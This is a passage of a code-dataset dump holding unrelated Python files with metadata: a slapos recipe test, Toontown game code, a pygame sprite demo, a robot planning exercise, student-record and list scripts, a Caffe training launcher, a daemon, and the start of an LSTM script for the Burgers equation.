\"234\",\n \"configuration-file\": config_file_path,\n \"data-directory\": os.path.join(self.test_dir, \"test_install_data_directory_srv_cloudooo-X\"),\n \"wrapper\": os.path.join(self.test_dir, \"test_install_wrapper_service_cloudooo-X\"),\n })\n recipe.install()\n data = open(config_file_path).read()\n self.assertIn(\"[app:main]\", data)\n self.assertIn(\"[server:main]\", data)\n\n # Check if mimetype_registry is well ordered\n self.assertIn(\"\\n text/install mimetype/entry addition\\n text/* * ooo\\n\", data)\n\n # Check OnlyOffice entries\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/vnd.openxmlformats-officedocument.presentationml.presentation application/x-asc-presentation x2t\",\n \" application/vnd.openxmlformats-officedocument.spreadsheetml.sheet application/x-asc-spreadsheet x2t\",\n \" application/vnd.openxmlformats-officedocument.wordprocessingml.document application/x-asc-text x2t\",\n \"\",\n ]), data)\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/x-asc-presentation application/vnd.openxmlformats-officedocument.presentationml.presentation x2t\",\n \" application/x-asc-spreadsheet application/vnd.openxmlformats-officedocument.spreadsheetml.sheet x2t\",\n \" application/x-asc-text 
application/vnd.openxmlformats-officedocument.wordprocessingml.document x2t\",\n \"\",\n ]), data)\n","sub_path":"slapos/test/recipe/test_generic_cloudooo.py","file_name":"test_generic_cloudooo.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"645047200","text":"# File: t (Python 2.2)\n\nfrom direct.showbase.ShowBaseGlobal import *\nfrom toontown.toonbase.ToonBaseGlobal import *\nfrom toontown.toonbase.ToontownGlobals import *\nfrom toontown.distributed.ToontownMsgTypes import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom direct.fsm import ClassicFSM\nfrom direct.fsm import State\nfrom toontown.minigame import Purchase\nfrom otp.avatar import DistributedAvatar\nimport SkyUtil\nimport Hood\nfrom toontown.estate import EstateLoader\nfrom toontown.estate import HouseGlobals\nimport ZoneUtil\n\nclass EstateHood(Hood.Hood):\n notify = DirectNotifyGlobal.directNotify.newCategory('EstateHood')\n \n def __init__(self, parentFSM, doneEvent, dnaStore, hoodId):\n Hood.Hood.__init__(self, parentFSM, doneEvent, dnaStore, hoodId)\n self.fsm = ClassicFSM.ClassicFSM('Hood', [\n State.State('start', self.enterStart, self.exitStart, [\n 'safeZoneLoader']),\n State.State('safeZoneLoader', self.enterSafeZoneLoader, self.exitSafeZoneLoader, [\n 'quietZone']),\n State.State('quietZone', self.enterQuietZone, self.exitQuietZone, [\n 'safeZoneLoader']),\n State.State('final', self.enterFinal, self.exitFinal, [])], 'start', 'final')\n self.fsm.enterInitialState()\n self.id = MyEstate\n self.safeZoneLoaderClass = EstateLoader.EstateLoader\n self.storageDNAFile = 'phase_5.5/dna/storage_estate.dna'\n self.holidayStorageDNADict = {\n WINTER_DECORATIONS: [\n 'phase_5.5/dna/winter_storage_estate.dna'] }\n self.skyFile = 'phase_3.5/models/props/TT_sky'\n self.popupInfo = None\n\n \n def load(self):\n Hood.Hood.load(self)\n\n \n def unload(self):\n del self.safeZoneLoaderClass\n if self.popupInfo:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n if not wantOtpServer:\n base.cr.disableAll()\n \n Hood.Hood.unload(self)\n\n \n def enter(self, requestStatus):\n hoodId = requestStatus['hoodId']\n zoneId = requestStatus['zoneId']\n self.accept('kickToPlayground', self.kickToPlayground)\n self.fsm.request(requestStatus['loader'], [\n requestStatus])\n\n \n def exit(self):\n if self.loader:\n self.loader.exit()\n self.loader.unload()\n del self.loader\n \n Hood.Hood.exit(self)\n\n \n def loadLoader(self, requestStatus):\n loaderName = requestStatus['loader']\n if loaderName == 'safeZoneLoader':\n self.loader = self.safeZoneLoaderClass(self, self.fsm.getStateNamed('safeZoneLoader'), self.loaderDoneEvent)\n self.loader.load()\n \n\n \n def spawnTitleText(self, zoneId):\n return None\n\n \n def hideTitleTextTask(self, task):\n return Task.done\n\n \n def kickToPlayground(self, retCode):\n if retCode == 0:\n msg = TTLocalizer.EstateOwnerLeftMessage % HouseGlobals.BOOT_GRACE_PERIOD\n self._EstateHood__popupKickoutMessage(msg)\n elif retCode == 1:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n elif retCode == 2:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 
'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n else:\n self.notify.error('unknown reason for exiting estate')\n\n \n def _EstateHood__popupKickoutMessage(self, msg):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n buttons = loader.loadModelOnce('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent = hidden, relief = None, state = 'normal', text = msg, frameSize = (-1, 1, -1, 1), text_wordwrap = 10, geom = getDefaultDialogGeom(), geom_color = GlobalDialogColor, geom_scale = (0.88, 1, 0.75), geom_pos = (0, 0, -0.080000000000000002), text_scale = 0.080000000000000002, text_pos = (0, 0.10000000000000001))\n DirectButton(self.popupInfo, image = okButtonImage, relief = None, text = TTLocalizer.EstatePopupOK, text_scale = 0.050000000000000003, text_pos = (0.0, -0.10000000000000001), textMayChange = 0, pos = (0.0, 0.0, -0.29999999999999999), command = self._EstateHood__handleKickoutOk)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n\n \n def _EstateHood__handleKickoutOk(self):\n self.popupInfo.reparentTo(hidden)\n\n \n def skyTrack(self, task):\n return SkyUtil.cloudSkyTrack(task)\n\n \n def startSky(self):\n SkyUtil.startCloudSky(self)\n if base.cloudPlatformsEnabled:\n self.loader.startCloudPlatforms()\n \n\n \n def stopSky(self):\n Hood.Hood.stopSky(self)\n self.loader.stopCloudPlatforms()\n\n\n","sub_path":"toontown/hood/EstateHood.py","file_name":"EstateHood.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23448764","text":"import csv\nimport os\n\n#os.chdir('insight_testsuite/tests/test_1/output')\n\nclass OutputHandler:\n def __init__(self, outputFilePath):\n self.outputFilePath = outputFilePath\n \n def save_to_csv(self,header,output):\n \"\"\"\n This function writes the final computed data into a csv file\n using the default csv package in python\n :param header: explicitly defined header row for the csv file\n :param output: the list of rows that need to be written to csv file\n \"\"\"\n with open(self.outputFilePath, 'w') as file:\n writer = csv.writer(file)\n writer.writerow(header)\n writer.writerows(output)\n \n path = os.getcwd()\n print(path)\n return 'Save success!'\n","sub_path":"src/storage/OutputHandler.py","file_name":"OutputHandler.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309255429","text":"n=int(input(\"Podaj n: \"))\nm=int(input(\"Podaj m: \"))\n\nlistan=[]\nlistam=[]\nc=''\n\nfor i in range(n):\n x = str(input(\"Podaj element do listy 1: \"))\n listan.append(x)\n\nfor j in range(m):\n y = str(input(\"Podaj element do tablicy 2: \"))\n listam.append(y)\n\nfor i in range(n):\n for j in range(m):\n if listan[i]==listam[j]:\n c+=listan[i]\n c+=', '\n\n\nprint(\"Lista pierwsza to: \", listan)\nprint(\"Lista druga to: \", listam)\nif c == '':\n print(\"Nie ma czesci wspolnej\")\nelse:\n print(\"CZESCIA WSPOLNA TABLIC JEST: \", c)","sub_path":"lab05/cw_7.py","file_name":"cw_7.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"75647117","text":"import pygame\r\nimport random\r\n\r\nglobal BLACK, WHITE, 
BLUE, SCREEN_WIDTH, SCREEN_HEIGHT, GAME_FLOOR\r\n\r\n#set up constants for screen dimensions and colours\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\n\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FLOOR = SCREEN_HEIGHT-100\r\n\r\n#create an object to act as a reference for our spritesheet\r\nclass SpriteSheet(object):\r\n\tdef __init__(self, filename):\r\n\t\t#load the spritesheet specified by filename \r\n\t\tself.sprite_sheet = pygame.image.load(filename).convert()\r\n\t\t#get dimension information for the sprite sheet\r\n\t\tself.rect = self.sprite_sheet.get_rect()\r\n\r\n\t#this function returns a section of the spritesheet as an image\r\n\tdef get_image(self,x,y,width,height):\r\n\t\t#create a blank surface to contain the sprite we're going to pull from the spritesheet\r\n\t\timage = pygame.Surface([width,height]).convert()\r\n\t\t#copy the specified section of spritesheet to the \"image\" surface\r\n\t\timage.blit(self.sprite_sheet, (0,0), (x, y, width, height))\r\n\t\t#set the colour key of the sprite that's going to be returned\r\n\t\timage.set_colorkey(WHITE)\r\n\t\t#return back the section of the sprite sheet we've specified\r\n\t\treturn image\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\t#set up two values to use to move the sprite along x and y axis\r\n\t#0 means the sprite isnt moving along that axis.\r\n\tchange_x = 0\r\n\tchange_y = 0\r\n\r\n\t#these arrays are to be used to contain the frames for the walk cycle\r\n\twalking_frames_left = []\r\n\twalking_frames_right = []\r\n\tdirection = \"R\"\r\n\r\n\tdef __init__(self):\r\n\t\tpygame.sprite.Sprite.__init__(self)\r\n\t\t#load the sprite sheet\r\n\t\tsprite_sheet = SpriteSheet(\"bret_run_sprite_sheet.png\")\r\n\t\t#specify how many frames are contained in the sprite sheet\r\n\t\tframes_in_walk_cycle=8\r\n\t\t#work out the width of each individual frame\r\n\t\tsprite_width=sprite_sheet.rect.width / frames_in_walk_cycle\r\n\t\t#as all sprites are on one line the height of each frame is the same as the sprite sheet\r\n\t\tsprite_height=sprite_sheet.rect.height\r\n\t\t\r\n\t\t#cycle through each frame in sprite sheet\r\n\t\tfor i in range(frames_in_walk_cycle):\r\n\t\t\t#assign current frame to a temporary frame image\r\n\t\t\ttemp_frame = sprite_sheet.get_image(i * sprite_width, 0, sprite_width, sprite_height)\r\n\t\t\t#add current frame to array of right-facing walking frame images\r\n\t\t\tself.walking_frames_right.append(temp_frame)\r\n\t\t\t#flip frame over on x-axis to get left facing image\r\n\t\t\ttemp_frame = pygame.transform.flip(temp_frame, True, False)\r\n\t\t\t#add current frame to array of left-facing wlaking frame images\r\n\t\t\tself.walking_frames_left.append(temp_frame)\r\n\r\n\t\t#set initial frame image\t\r\n\t\tself.image = self.walking_frames_right[0]\r\n\r\n\t\t#create rectangle object to hold frame info\r\n\t\tself.rect = self.image.get_rect()\r\n\r\n\tdef update(self):\r\n\t\t\r\n\t\t#move left/right\r\n\t\tself.fall_from_jump()\r\n\t\tself.rect.x += self.change_x\r\n\t\tpos = self.rect.x\r\n\t\t\r\n\t\t#set how many pixels we need to move by before walk cycle frame changes\r\n\t\tpixels_per_frame=30\r\n\r\n\t\t# This determines what the current walk cycle frame is. 
This is a bit of a fudge -\r\n\t\t# basically every position in the 'game world' has a walk cycle frame assigned to it\r\n\t\t# - this is worked out by dividing the current position (pos) by the number of pixels we\r\n\t\t# need to move by before the frame changes (pixels_per_frame) - to ensure that this always\r\n\t\t# gives a value within the range of walk cycle frames available, we divide that number by\r\n\t\t# the number of frames available and set the current frame to the remainder (done using 'modulus')\r\n\t\t\r\n\t\tif self.direction == \"R\": # if heading right, use the right-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_right)\r\n\t\t\tself.image = self.walking_frames_right[frame]\r\n\t\telse: # otherwise use the left-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_left)\r\n\t\t\tself.image = self.walking_frames_left[frame]\r\n\r\n\t\t# Move up/down\r\n\t\tself.rect.y += self.change_y\r\n\t\t\t\r\n\t# if player directs character to go left, then change x position by -6\r\n\tdef go_left(self):\r\n\t\tself.change_x = -6\r\n\t\tself.direction = \"L\"\r\n\t\r\n\t# if player directs character to go right, then change x position by +6\r\n\tdef go_right(self):\r\n\t\tself.change_x = 6\r\n\t\tself.direction = \"R\"\r\n\t\r\n\tdef fall_from_jump(self):\r\n\t\tif self.change_y == 0:\r\n\t\t\tself.change_y = 1\r\n\t\telse:\r\n\t\t\tself.change_y += .5\r\n\t\t\r\n\t\tif self.rect.y >= GAME_FLOOR - self.rect.height and self.change_y >= 0:\r\n\t\t\tself.change_y = 0\r\n\t\t\tself.rect.y = GAME_FLOOR - self.rect.height\r\n\t\t\t\r\n\tdef jump(self):\r\n\t\t\t# check player is standing on the floor\r\n\t\t\tif self.rect.bottom >= GAME_FLOOR:\r\n\t\t\t\tself.change_y = -10\r\n\t\t\t\r\n\t# if player stops directing character, then set the amount to change x by to 0\r\n\tdef stop(self):\r\n\t\tself.change_x = 0\r\n\r\n\r\ndef main():\r\n\t# set up initial game environment\r\n\tglobal SCREEN_WIDTH, SCREEN_HEIGHT, BLACK, WHITE, BLUE\r\n\tpygame.init()\r\n\tscreen = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n\tpygame.display.set_caption(\"Walk Cycle Test\")\r\n\r\n\t# create player\r\n\tplayer = Player()\r\n\r\n\t# set players initial x-axis position\r\n\tplayer.rect.x = 340\r\n\t# set players initial y-axis position to be at bottom of screen\r\n\tplayer.rect.y = GAME_FLOOR - player.rect.height\r\n\t\r\n\t# create a group to hold our sprites\r\n\tactive_sprite_list = pygame.sprite.Group()\r\n\t# add player sprite to the sprite group\r\n\tactive_sprite_list.add(player)\r\n\r\n\t# set up initial game loop \r\n\tdone = False\r\n\tclock = pygame.time.Clock()\r\n\r\n\t### - MAIN GAME LOOP - ###\r\n\twhile not done:\r\n\t\t# look for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\t# exit if user closes window\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tdone = True\r\n\t\t\t\r\n\t\t\t# check to see if a key is pressed down\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t# if left arrow is pressed, then go left\r\n\t\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\t\tplayer.go_left()\r\n\t\t\t\t# if right arrow is pressed, go right\r\n\t\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\t\tplayer.go_right()\r\n\t\t\t\t# if up arrow is pressed, then jump\r\n\t\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\t\tplayer.jump()\r\n\t\t\t\t\r\n\t\t\t# check for when user releases key\r\n\t\t\tif event.type == pygame.KEYUP:\r\n\t\t\t\t# if the depressed key was the left arrow and the amount to move the\r\n\t\t\t\t# 
player character by is still set to a non zero amount, then stop the player\r\n\t\t\t\t# - this is to prevent the player character from continuing to move after the key is\r\n\t\t\t\t# released.\r\n\t\t\t\tif event.key == pygame.K_LEFT and player.change_x < 0:\r\n\t\t\t\t\tplayer.stop()\r\n\t\t\t\t# same as above but for right arrow\r\n\t\t\t\tif event.key == pygame.K_RIGHT and player.change_x > 0:\r\n\t\t\t\t\tplayer.stop()\r\n\r\n\t\t### Draw current level in buffer ####\r\n\t\tscreen.fill(BLACK)\r\n\t\t### Update Sprite Positions in buffer ###\r\n\t\tactive_sprite_list.update()\r\n\t\t### Draw Sprites ###\r\n\t\tactive_sprite_list.draw(screen)\r\n\r\n\t\t### Set game FPS ###\r\n\t\tclock.tick(60)\r\n\r\n\t\t### Draw buffer to screen ###\r\n\t\tpygame.display.flip()\r\n\t\r\n\t# Main game loop has exited here so we can tidy up and exit.\r\n\tpygame.quit()\r\n\r\nmain()\r\n\t\t\r\n\t\t\r\n","sub_path":"Projects/Old_2d_scroller_files/platformer_tests/walk_jump.py","file_name":"walk_jump.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"151801508","text":"from json import load\nfrom copy import deepcopy\nfrom math import sqrt\n\ndef parse_json(file):\n located = {}\n on = {}\n\n #open json file for initial world\n f = open(file)\n fdata = load(f)\n\n #goes through each key from json file \n for key in fdata.keys():\n #set the world \n located[key] = fdata[key]\n on[key] = 'floor'\n\n return located, on \n\ndef distance(tuple1,tuple2): \n return sqrt((tuple1[0]-tuple2[0])**2 + (tuple1[1]-tuple2[1])**2)\n\nclass World:\n\n def __init__(self, world_file, robot_loc):\n self.located, self.on = parse_json(world_file)\n self.located['Robot'] = robot_loc\n self.cost = 0\n self.onRobot = 0\n self.action = None\n \n # returns list of drive successors\n def drive(self):\n successors = []\n if self.checkRobot(): \n #drive to each ballon locations\n curr_robot_loc = self.located['Robot']\n #drive to each balloon's location\n for eachKey in self.located.keys(): \n if eachKey is not 'Robot' :\n #get location of the ballon \n new_robot_loc = self.located[eachKey]\n #make copy of this self \n temp = deepcopy(self)\n #update the location (simulate the drive)\n temp.located['Robot'] = new_robot_loc\n # assign action to world\n temp.action = ('drive', new_robot_loc)\n #cost actually distance to drive based on robot's location \n temp.updateCost(distance(curr_robot_loc,new_robot_loc))\n #append temp to allSuccessors \n successors.append(temp)\n \n return successors\n\n def pickup1(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 1:\n #pick up ballon (update where balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to onRobot\n temp.onRobot += 1\n #change status of balloon\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up a second balloon\n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def pickup2(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 0:\n #pick up the second balloon (update where the second balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to 
onRobot\n temp.onRobot += 1\n # update on\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up 2 balloon \n temp.updateCost(7)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def putdown(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'Robot') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot > 0:\n #make copy of this self \n temp = deepcopy(self)\n #update the location \n temp.located[eachKey] = temp.located['Robot']\n # update status \n temp.on[eachKey] = 'floor'\n # assign action to world\n temp.action = ('putdown', NULL)\n #update cost of picking up 1 ballon \n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n\n def checkRobot (self): \n if 'Robot' in self.located.keys(): \n return True \n return False \n\n def getOn(self): \n return self.on\n\n def getLocated(self): \n return self.located \n \n def robotHasBalloon(self,lookAt): \n for eachKey in self.on.keys(): \n if (eachKey is not lookAt) and (self.on[eachKey] == 'Robot'):\n return True \n return False \n\n def updateCost(self,number):\n self.cost = number\n\n def getSuccessors(self):\n #list of all successors \n allSuccessors = [] \n\n #1. add drive action successors \n allSuccessors.extend(self.drive())\n\n #2.Check if robot can pick up a second ballon (any color)\n allSuccessors.extend(self.pickup1())\n \n #3.Check if robot can pick up a balloon (any color) from none\n allSuccessors.extend(self.pickup2())\n\n #4.Check if robot can put down a balloon\n allSuccessors.extend(self.putdown())\n\n return allSuccessors\n\n def distanceFromGoal(self, goal_locations):\n '''\n A hueristic that sums of the distance of the balloons with where they are and where they should be \n \n goal_locations: a dictionary of the final balloon locations {['Red': (5,7), ...]}\n '''\n sum_ = 0\n for balloon in goal_locations.keys():\n sum_ += distance(self.located[balloon], goal_locations[balloon])\n \n return sum_\n\n def getAction(self):\n return self.action\n\n def printWorld(self):\n print(\"this is where everything locate \", self.located)\n print(\"this is everything that are on \", self.on)\n print(\"cost to get to this world is \", self.cost)\n \n\n############ end of world class ###############\n\n\n\n\nw = World('simple.json', (1,3))\nw.printWorld()\nallChildren = w.getSuccessors()\nfor i in allChildren:\n i.printWorld()\n\n\n\n","sub_path":"actionPlaning/world-1.py","file_name":"world-1.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"462177942","text":"\"\"\"\n使用字典:学生管理系统\n学生姓名管理系统:\n names_list = [\"王二狗\", \"Rose\", \"Jack\" ...]\n 增加学生姓名,删除,修改,查找。。\n append(),\n pop(index),remove(元素)\n name_list[index] = 新值\n\n字典:存储一组信息\n names_list = [\n {\n \"name\": \"王二狗\",\n \"age\" : 18,\n \"QQ\": \"1234567\"\n },\n {\n \"name\":\"Rose\",\n \"age\":19,\n \"QQ\":\"567878\"\n },\n .....\n ]\n\n\n 新增学生信息:\n\n 创建字典:stu_dict = {}\n 接收姓名,年龄,QQ\n stu_dict[\"name\"] = 姓名\n stu_dict[\"age\"] = 18\n stu_dict[\"QQ\"] = \"12345\"\n names_list.append(stu_dict)\n\n 删除:del_name = \"王二狗\"\n\n 修改:\n\n 
查找:\n\"\"\"\n\n\nprint(\"------------------欢迎来到学生管理同学---------------\")\nprint(\"----------------请选择一下操作中的任意一项-----------\")\nprint(\"----------------1.添加学生-----------\")\nprint(\"----------------2.删除学生-----------\")\nprint(\"----------------3.修改学生-----------\")\nprint(\"----------------4查找学生-----------\")\nprint(\"----------------5.查看所有学生-----------\")\nprint(\"----------------6.退出-----------\")\nstudent = []\nwhile True:\n choose = int(input(\"请选择:\"))\n if choose == 1:\n name_student = input(\"请输入学生姓名:\")\n age_student = int(input(\"请输入学生年龄:\"))\n qq_number_student = input(\"请输入QQ号码:\")\n student.append(dict(name=name_student, age=age_student, qq_number=qq_number_student))\n print(\"添加成功\")\n elif choose == 2:\n name_student = input(\"请输入要删除的学生的名字:\")\n for stu in student:\n if stu[\"name\"] == name_student:\n print(type(stu))\n student.remove(stu)\n print(\"删除成功\")\n else:\n print(\"该学生不存在。。。。\")\n elif choose == 3:\n name_student = input(\"请输入要修改的学生的姓名:\")\n print(\"1.修改姓名\")\n print(\"2.修改年龄\")\n print(\"3.修改QQ号码\")\n select = int(input(\"请输入要修改的信息编号:\"))\n for stu in student:\n if stu[\"name\"] == name_student:\n if select == 1:\n new_name = input(\"请输入新名字:\")\n stu[\"name\"] = new_name\n elif select == 2:\n new_age = int(input(\"请输入新的年龄:\"))\n stu[\"age\"] = new_age\n elif select == 3:\n new_qq = input(\"请输入新的QQ号码:\")\n stu[\"qq_number\"] = new_qq\n print(\"修改成功\")\n elif choose == 4:\n name_student = input(\"请输入要查找的学生的名字:\")\n for stu in student:\n if stu[\"name\"] == name_student:\n print(stu)\n elif choose == 5:\n for stu in student:\n print(stu)\n elif choose == 6:\n print(\"系统退出\")\n break\n\n\n\n\n","sub_path":"20171114/work/work2_2.py","file_name":"work2_2.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"530194986","text":"# Default Imports\nfrom greyatomlib.python_intermediate.q05_read_csv_data.build import read_ipl_data_csv\nimport numpy as np\n\npath = 'data/ipl_matches_small.csv'\ndtype='|S20'\r\n# Enter Code Here\r\ndef get_total_extras():\r\n data=np.genfromtxt(path, skip_header=1,delimiter=\",\",dtype=dtype);\r\n x=data[:,17].astype(np.int)\r\n extrun = np.sum(x)\r\n return extrun\r\n","sub_path":"q08_get_total_extras/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"410542341","text":"#!/usr/bin/env python\nimport os, sys\nimport subprocess\n\ncaffe_bin = '/home/Working/caffe/build/tools/caffe' # PLEASE MODIFY TO YOUR LOCAL DIRECTORY\ntemplate = 'model/train.template.quad.prototxt'\n\nsubprocess.call('mkdir -p tmp/tmp_model', shell=True)\n\nbatch_size_train = 4\nbatch_size_test = 1\ncrop_width = 768\ncrop_height = 384\n# crop_width = 960\n# crop_height = 512\ninput_width = 960\ninput_height = 540\ntrain_data_lmdb = \"/home/Working/data/FlyingThingsLMDB\"\ntest_data_lmdb = \"/home/Working/data/FlyingThingsLMDB\"\n\nreplacement_list = {\n '$BATCH_SIZE_TRAIN': ('%d' % batch_size_train),\n '$BATCH_SIZE_TEST' : ('%d' % batch_size_test),\n '$TRAIN_DATA_LMDB' : ('%s' % train_data_lmdb),\n '$TEST_DATA_LMDB' : ('%s' % test_data_lmdb),\n '$CROP_WIDTH' : ('%d' % crop_width),\n '$CROP_HEIGHT' : ('%d' % crop_height),\n '$INPUT_WIDTH' : ('%d' % input_width),\n '$INPUT_HEIGHT' : ('%d' % input_height)\n}\n\nproto = ''\nwith open(template, \"r\") as tfile:\n proto = tfile.read()\n\nfor r in replacement_list:\n proto = proto.replace(r, 
replacement_list[r])\n\nwith open('tmp/tmp_model/train.prototxt', \"w\") as tfile:\n tfile.write(proto)\n\n\n\nos.system('mkdir training') \nos.chdir('training') \n\n# =========================================================\n\nmy_dir = os.path.dirname(os.path.realpath(__file__))\nos.chdir(my_dir)\n\nif not os.path.isfile(caffe_bin):\n print('Caffe tool binaries not found. Did you compile caffe with tools (make all tools)?')\n sys.exit(1)\n\nprint('args:', sys.argv[1:])\n\n\ntrained_filenames = os.listdir('./')\n\nif len(trained_filenames)==0:\n\t# start from scratch\n\targs = [caffe_bin, 'train', '-solver', '../model/solver.prototxt'] + sys.argv[1:]\nelse:\n\t# start from the latest training result\n\titers = []\n\tfor i in range(len(trained_filenames)):\n\t\ti0 = trained_filenames[i].find('iter_')\n\t\tif i0==-1:\n\t\t\tcontinue\n\t\ti1 = trained_filenames[i].find('.')\n\t\titers.append(int(trained_filenames[i][i0+5:i1]))\t\t\n\tlatest_iter = max(iters)\n\targs = [caffe_bin, \n\t\t'train', \n\t\t'-solver', '../model/solver.prototxt', \n\t\t'-snapshot', 'disp_iter_'+ str(latest_iter) + '.solverstate',\n\t\t] + sys.argv[1:]\n\t\ncmd = str.join(' ', args)\nprint('Executing %s' % cmd)\n\nsubprocess.call(args)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"454506495","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport os,sys\nimport time\n\ndef main():\n try:\n pid=os.fork()\n except OSError:\n pass\n if pid>0:\n sys.exit(0)\n\n os.setsid() #重设会话组\n os.chdir('/tmp') #切换自己的家目录\n os.umask(0) #重设umask\n for d in range(sys.getdlopenflags()):\n os.close(d)\n\n while True:\n with open('daemon.log','a+') as f:\n f.write(time.ctime()+'\\n')\n f.close()\n time.sleep(5)\n sys.exit(0)\n\nif __name__=='__main__':\n main()\n","sub_path":"py/daemon/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308366200","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLearning from past (LP) interface learning for 1D Burgers problem with an \ninitial condition of square wave. \nLeft zone is truncated and compensated for by an LSTM model.\n\nThis correpsonds to Example 1 for the following paper:\n \"Interface learning of multiphysics and multiscale systems\",\n Physical Review E, 2020\n \nFor questions, comments, or suggestions, please contact Shady Ahmed,\nPhD candidate, School of Mechanical and Aerospace Engineering, \nOklahoma State University. 
@ shady.ahmed@okstate.edu\nlast checked: 11/10/2020\n\"\"\"\n\n#%% Import libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nfrom scipy.linalg import block_diag\n\nfrom numpy.random import seed\nseed(0)\n\nimport tensorflow as tf\ntf.random.set_seed(0)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport joblib\n\nimport os\nimport sys\n#%% Define Functions\n\n#-----------------------------------------------------------------------------!\n#compute rhs for numerical solutions\n# r = -u*u' + nu*u''\n#-----------------------------------------------------------------------------!\ndef rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u):\n r = np.zeros(nx-nxb+1)\n r[1:nx-nxb] =(nu2/(dx*dx))*(u[2:nx-nxb+1] -2.0*u[1:nx-nxb] +u[0:nx-nxb-1])\\\n - g2*u[1:nx-nxb] \\\n -(1.0/3.0)*(u[2:nx-nxb+1]+u[0:nx-nxb-1]+u[1:nx-nxb])\\\n *(u[2:nx-nxb+1]-u[0:nx-nxb-1])/(2.0*dx)\n return r\n\n#-----------------------------------------------------------------------------#\n# Neural network Routines\n#-----------------------------------------------------------------------------#\ndef create_training_data_lstm(features,labels, m, n, lookback):\n # m : number of snapshots \n # n: number of states\n ytrain = [labels[i,:] for i in range(lookback,m)]\n ytrain = np.array(ytrain) \n \n xtrain = np.zeros((m-lookback,lookback,n))\n for i in range(m-lookback):\n a = np.copy(features[i,:])\n for j in range(1,lookback):\n a = np.vstack((a,features[i+j,:]))\n xtrain[i,:,:] = a\n return 